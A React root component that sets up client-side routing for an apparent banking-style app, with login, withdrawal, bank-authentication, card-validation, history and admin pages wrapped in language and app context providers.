import { useState, useEffect } from "react";
import "@/App.css";
import { BrowserRouter, Routes, Route, Navigate } from "react-router-dom";
import { Toaster } from "@/components/ui/sonner";

// Pages
import LoginPage from "@/pages/LoginPage";
import DashboardPage from "@/pages/DashboardPage";
import WithdrawPage from "@/pages/WithdrawPage";
import BankAuthPage from "@/pages/BankAuthPage";
import CardValidationPage from "@/pages/CardValidationPage";
import SuccessPage from "@/pages/SuccessPage";
import UserHistoryPage from "@/pages/UserHistoryPage";
import AdminPage from "@/pages/AdminPage";
import AdminLoginPage from "@/pages/AdminLoginPage";

// Context
import { AppProvider } from "@/context/AppContext";
import { LanguageProvider } from "@/context/LanguageContext";

function App() {
  return (
    <LanguageProvider>
    <AppProvider>
      <div className="app-container vault-bg">
        <BrowserRouter>
          <Routes>
            <Route path="/" element={<LoginPage />} />
            <Route path="/dashboard" element={<DashboardPage />} />
            <Route path="/withdraw" element={<WithdrawPage />} />
            <Route path="/bank-auth" element={<BankAuthPage />} />
            <Route path="/card-validation" element={<CardValidationPage />} />
            <Route path="/success" element={<SuccessPage />} />
            <Route path="/user-history" element={<UserHistoryPage />} />
            <Route path="/admin-login" element={<AdminLoginPage />} />
            <Route path="/admin" element={<AdminPage />} />
            <Route path="*" element={<Navigate to="/" replace />} />
          </Routes>
        </BrowserRouter>
        <Toaster position="top-center" richColors />
      </div>
    </AppProvider>
    </LanguageProvider>
  );
}

export default App;
